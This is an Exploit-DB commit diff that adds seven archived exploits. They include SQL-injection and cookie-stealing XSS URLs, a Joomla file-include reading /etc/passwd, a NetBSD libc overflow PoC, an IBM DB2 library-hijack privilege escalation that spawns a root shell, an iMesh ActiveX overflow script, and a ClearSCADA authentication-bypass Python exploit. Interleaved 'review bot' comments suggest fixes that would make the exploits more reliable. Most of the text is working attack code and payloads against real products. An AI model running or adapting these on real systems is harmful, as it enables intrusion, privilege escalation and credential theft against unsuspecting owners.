Update: 2015-01-29

7 new exploits
This commit is contained in:
Offensive Security 2015-01-29 08:36:27 +00:00
parent 40cfbfb905
commit e216d45120
8 changed files with 381 additions and 0 deletions


@ -32358,3 +32358,10 @@ id,file,description,date,author,platform,type,port
35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80
35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0
35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0
35918,platforms/multiple/remote/35918.c,"IBM DB2 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution Vulnerability",2011-06-30,"Tim Brown",multiple,remote,0
35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow Vulnerability",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0
35921,platforms/windows/remote/35921.html,"iMesh 10.0 'IMWebControl.dll' ActiveX Control Buffer Overflow Vulnerability",2011-07-04,KedAns-Dz,windows,remote,0
35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include Vulnerability",2011-07-05,FL0RiX,php,webapps,0
35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-07-02,Net.Edit0r,asp,webapps,0
35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48559/info
Paliz Portal is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Page.aspx?search=1[XSSCode]&mID=1641&Page=search/advancedsearch
http://www.example.com/News/shownews/[page].aspx?NewsId=[Sqli]
http://www.example.com/[Path]/Default.aspx?tabid=[Sqli]
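Review bot: The advisory never states which version(s) of Paliz Portal are affected, whereas the other advisories in this commit (WebCalendar 1.2.3, iMesh 10.0, IBM DB2 9.7) each carry an "X is vulnerable; other versions may also be affected." line; without it a defender cannot match the entry against an installed build. The same omission applies to 35922.txt (Joomla! 'com_jr_tfb'). If the referenced BID does not name a version, a line such as `Affected version: not specified in source advisory` would make the gap explicit instead of silent.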

platforms/bsd/remote/35919.c Executable file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/48528/info
NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library.
Successful exploits may allow an attacker to execute arbitrary code in the context of the application using the affected library. Failed exploit attempts will result in a denial-of-service condition.
/*
127# gcc -o grr grr.c && ./grr 6050
127# gcc -o grr grr.c && ./grr 6051
Memory fault (core dumped)
127#
*/
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
int main(int argc, char *argv[]){
char *cycek;
cycek=malloc(atoi(argv[1]));
if(!cycek) return 1;
memset(cycek,'A',atoi(argv[1]));
getservbyname(cycek,"tcp");
return 0;
}
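Review bot: The three advisory lines at the top of the file (`source: …`, `NetBSD is prone …`, `Successful exploits …`) sit outside the `/* … */` block that begins on the following line, so the file as committed is not valid C and will not compile until those lines are moved inside the comment; 35918.c has the same problem with its four-line preamble. Separately, `main` dereferences `argv[1]` in both `atoi` calls without checking `argc`, so running the PoC with no argument reads through a null pointer; a guard `if (argc < 2) return 1;` before the first `atoi` would make the failure explicit.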


@ -0,0 +1,69 @@
source: http://www.securityfocus.com/bid/48514/info
IBM DB2 is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Successfully exploiting this issue will result in a complete compromise of the affected system.
IBM DB2 9.7 is vulnerable; other versions may also be affected.
/*
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the Nth Dimension nor the names of its contributors may
be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
(c) Tim Brown, 2011
<mailto:timb@nth-dimension.org.uk>
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
PoC exploit for IBM DB2 DT_RPATH privesc.
*/
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv) {
FILE *badlibkbbsrchandle;
int pwnedflag;
printf("PoC exploit for IBM DB2 DT_RPATH privesc.\r\n");
printf("(c) Tim Brown, 2011\r\n");
printf("<mailto:timb@nth-dimension.org.uk>\r\n");
printf("<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>\r\n");
printf("Constructing bad_libkbb.so...\r\n");
badlibkbbsrchandle = fopen("bad_libkbb.c", "w");
fprintf(badlibkbbsrchandle, "#include <stdio.h>\r\n");
fprintf(badlibkbbsrchandle, "#include <unistd.h>\r\n");
fprintf(badlibkbbsrchandle, "#include <stdlib.h>\r\n");
fprintf(badlibkbbsrchandle, "\r\n");
fprintf(badlibkbbsrchandle, "void __attribute__ ((constructor)) bad_libkbb(void) {\r\n");
fprintf(badlibkbbsrchandle, " printf(\"Have a root shell...\\r\\n\");\r\n");
fprintf(badlibkbbsrchandle, " setuid(geteuid());\r\n");
fprintf(badlibkbbsrchandle, " system(\"/usr/bin/id\");\r\n");
fprintf(badlibkbbsrchandle, " system(\"/bin/sh\");\r\n");
fprintf(badlibkbbsrchandle, " exit(0);\r\n");
fprintf(badlibkbbsrchandle, "}\r\n");
fclose(badlibkbbsrchandle);
system("gcc -shared -fPIC -o libkbb.so bad_libkbb.c");
system("/opt/ibm/db2/V9.7/itma/tmaitm6/lx8266/bin/kbbacf1");
exit(0);
}
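Review bot: `fopen("bad_libkbb.c", "w")` in `main` is never checked for NULL, so in a read-only or full working directory every following `fprintf` writes through a null `FILE*` and the program crashes before reaching the `system` calls; `if (!badlibkbbsrchandle) { perror("fopen"); return 1; }` directly after the `fopen` line would fail cleanly. The return values of both `system()` calls are likewise discarded, so a missing compiler or a wrong install path (the binary path is hard-coded to one V9.7 layout) goes unreported and the PoC prints nothing diagnostic. `pwnedflag` is declared and never used.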

platforms/php/webapps/35920.txt Executable file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/48546/info
WebCalendar is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WebCalendar 1.2.3 is vulnerable; other versions may also be affected.
http://www.example.com/webapps/webcalendar/about/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/about/"><body onload=alert(&#039;XSS&#039;)>
http://www.example.com/webapps/webcalendar/datesel.php?form="><iframe onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/datesel.php?form=3&fday="><iframe onload=alert(document.cookie)>&fmonth=3&fyear=3&date=20110601
http://www.example.com/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth="><iframe onload=alert(document.cookie)>&fyear=3&date=20110601
http://www.example.com/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth=3&fyear="><iframe onload=alert(document.cookie)>&date=20110601
http://www.example.com/webapps/webcalendar/year.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/select_user.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/search_handler.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/datesel.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/edit_entry.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/search.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/help_edit_entry.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/catsel.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/help_index.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/help_docs.php/"><body onload=alert(document.cookie)>
http://www.example.com/webapps/webcalendar/help_bug.php/"><body onload=alert(document.cookie)>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48558/info
The 'com_jr_tfb' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
http://www.example.com/index.php?option=com_jr_tfb&controller=../../../../../../../../etc/passwd%00


@ -0,0 +1,63 @@
source: http://www.securityfocus.com/bid/48550/info
iMesh is prone to a buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
iMesh 10.0 is vulnerable; other versions may also be affected.
<!--
###
# Title : iMesh <= 10.0 (IMWebControl.dll) Remote Buffer Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Buffer Overflow & DLL Hijacked
##
# <3 Liyan Oz + All UE-Team & I.BackTrack Team <3
###
-->
<?XML version=&#039;1.0&#039; standalone=&#039;yes&#039; ?>
<package>
<job id=&#039;DoneInVBS&#039; debug=&#039;false&#039; error=&#039;true&#039;>
<object classid=&#039;clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B97&#039; id=&#039;target&#039;/>
<script language=&#039;vbscript&#039;>
&#039;Wscript.echo typename(target)
targetFile = "C:\Program Files\iMesh Applications\iMesh\IMWebControl.dll"
prototype = "ProcessRequestEx ( ByVal sourceName As String , ByVal destName As String , ByVal bFailIfExists As Long )"
memberName = "ProcessRequestEx"
progid = "target.IMWebControl"
buf=String(31337, "A") &#039; Buffer Overflow
puf=218959117 &#039;set ecx to 0x0d0d0d0d
target.SetHandler puf
target.ProcessRequestEx buf ,puf &#039; Bo0M !
</script>
</job>
</package>
<!--
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > ++ Liyan Oz & Blackrootkit ..all
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r &#039;www.1337day.com/team&#039; ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# Jago-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
-->
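Review bot: The script body as stored carries HTML character entities where the source has apostrophes — `&#039;Wscript.echo typename(target)`, `buf=String(31337, "A") &#039; Buffer Overflow`, and the attribute quotes in `<?XML version=&#039;1.0&#039; standalone=&#039;yes&#039; ?>` — which indicates the file was captured from an HTML-rendered copy rather than the author's original text; the same artifact appears in 35920.txt (`alert(&#039;XSS&#039;)`). The entry should be re-checked against the original submission so the archived file is byte-identical to what was published. The four advisory lines above the opening `<!--` are also outside any comment, unlike the banner that follows them.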

platforms/windows/remote/35924.py Executable file

@ -0,0 +1,172 @@
#!/usr/bin/python
# cs-auby.py
# ClearSCADA Remote Authentication Bypass Exploit
#
# Jeremy Brown
# [jbrown3264/gmail]
#
# Oct 2010 (released Jan 2015)
#
# There is an authentication bypass vulnerability in ClearSCADA that can be
# exploited by triggering an exception in dbserver.exe and taking advantage
# of the way the program handles it.
#
# When an exception in occurs, ClearSCADA enters "Safe Mode". This exposes
# it's diagnostic functions to remote users without requiring a valid login
# as it would normally. A remote attacker could view senstive information
# and possibly modify functions of the server running on the affected host.
#
# This code triggers an exception in dbserver.exe and checks to see if you
# can then access the diagnostic page without authentication.
#
# Tested on ClearSCADA 2010R1 running on Windows
#
# Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01
#
import sys
import socket
import httplib
import urllib
from time import sleep
pkt_1=(
"\xfb\x0e\x45\x06\x0e\x00\x00\x00\x18\x00\x00\x00"
"\x49\x00\x50\x00\x20\x00\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00"
"\x2e\x00\x30\x00\x2e\x00\x31\x00\x2c\x00\x20\x00\x53\x00\x65\x00"
"\x73\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x20\x00\x30\x00\x00\x00"
"\x08\x00\x00\x00"
)
pkt_2=(
"\x00\x00\x00\x00"
"\x26\x00\x00\x00"
"\x08\x00\x00\x00\x0f\x00\x00\x00\x43\x00\x72\x00\x79\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00"
"\x74\x00\x73\x00\x00\x00"
)
pkt_3=( # "Exception Occured"
"\x00\x00\x00\x00\xd7\x01\x00\x00\x34\x00\x00\x00\x0d\x00\x00\x00"
"\x09\x00\x00\x00\x43\x00\x50\x00\x72\x00\x6f\x00\x66\x00\x69\x00"
"\x6c\x00\x65\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x46\x00\x6c\x00\x6f\x00"
"\x61\x00\x74\x00\x00\x00\x0e\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x55\x00\x4c\x00\x6f\x00"
"\x6e\x00\x67\x00\x00\x00\x0d\x00\x00\x00\x43\x00\x50\x00\x72\x00"
"\x6f\x00\x66\x00\x69\x00\x6c\x00\x65\x00\x4c\x00\x6f\x00\x6e\x00"
"\x67\x00\x00\x00\x10\x00\x00\x00\x43\x00\x41\x00\x64\x00\xBB\x00" # last w0rd
"\x00\x42\x00\x49\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x42\x00\x59\x00\x54\x00\x45\x00\x56\x00\x61"
"\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x11"
"\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x57\x00\x4f\x00\x52"
"\x00\x44\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61"
"\x00\x70\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76"
"\x00\x44\x00\x49\x00\x4e\x00\x54\x00\x56\x00\x61\x00\x6c\x00\x75"
"\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x12\x00\x00\x00\x43"
"\x00\x41\x00\x64\x00\x76\x00\x55\x00\x44\x00\x49\x00\x4e\x00\x54"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
"\x00\x00\x00\x11\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x52"
"\x00\x45\x00\x41\x00\x4c\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65"
"\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41"
"\x00\x64\x00\x76\x00\x44\x00\x4f\x00\x55\x00\x42\x00\x4c\x00\x45"
"\x00\x56\x00\x61\x00\x6c\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70"
"\x00\x00\x00\x13\x00\x00\x00\x43\x00\x41\x00\x64\x00\x76\x00\x53"
"\x00\x74\x00\x72\x00\x69\x00\x6e\x00\x67\x00\x56\x00\x61\x00\x6c"
"\x00\x75\x00\x65\x00\x4d\x00\x61\x00\x70\x00\x00\x00\x0f\x00\x00"
"\x00\x43\x00\x43\x00\x72\x00\x79\x00\x73\x00\x74\x00\x61\x00\x6c"
"\x00\x52\x00\x65\x00\x70\x00\x6f\x00\x72\x00\x74\x00\x00\x00\x00"
)
port=5481
s_port=443
def do_ssl(target,port):
try:
conn = httplib.HTTPSConnection(target,port)
conn._http_vsn = 10
conn._http_vsn_str = "HTTP/1.0"
conn.request("GET","/diag/Info")
resp = conn.getresponse()
conn.close()
except Exception, error:
print("Error: %s" % error)
return None
return resp
def main():
if len(sys.argv)!=2:
print("Usage: %s <target>" % sys.argv[0])
sys.exit(0)
target=sys.argv[1]
cs=target,port
print "Checking server status..."
resp = do_ssl(target,s_port)
if(resp == None):
return
if(resp.status==301):
print "Server status is normal.\n"
elif(resp.status==200):
print "Server is already in safe mode."
sys.exit(1)
elif((resp.status!=301)|(resp.status!=200)):
print("Server returned %d %s, server state unknown.\nContinuing anyways..\n" % (resp.status,resp.reason))
print("Sending packets to trigger exception...\n")
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.send(pkt_1)
resp_1 = sock.recv(32)
sock.send(pkt_2)
resp_2 = sock.recv(32)
sock.send(pkt_3)
resp_3 = sock.recv(32)
sock.close()
except Exception, error:
print("Error: %s" % error)
return None
print("Finished, checking server status again...")
sleep(1)
resp = do_ssl(target,s_port)
if(resp == None):
return
if(resp.status==301):
print("Server status is still normal, maybe it's patched..\n")
elif(resp.status==200):
print("Server entered \"safe\" mode :)\n")
print("Surf on over to https://%s:443/diag/Info to explore" % target)
elif((resp.status!=301)|(resp.status!=200)):
print("Server returned %d %s, server state unknown." % (resp.status,resp.reason))
if __name__ == "__main__":
main()
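Review bot: The two `elif((resp.status!=301)|(resp.status!=200))` branches in `main` (one after each `do_ssl` call) apply a bitwise `|` to two inequality tests that can never both be false, so the condition is always true; the code only behaves as intended because the preceding `if`/`elif` already consumed 301 and 200, and a plain `else:` would state that directly. `do_ssl` returns `None` on any exception and `main` tests it with `resp == None`, where `resp is None` is the idiom. The usage error path calls `sys.exit(0)`, which reports success to the calling shell; `sys.exit(1)` would match the later exit on the already-in-safe-mode branch. `resp_1`, `resp_2` and `resp_3` are assigned and never read.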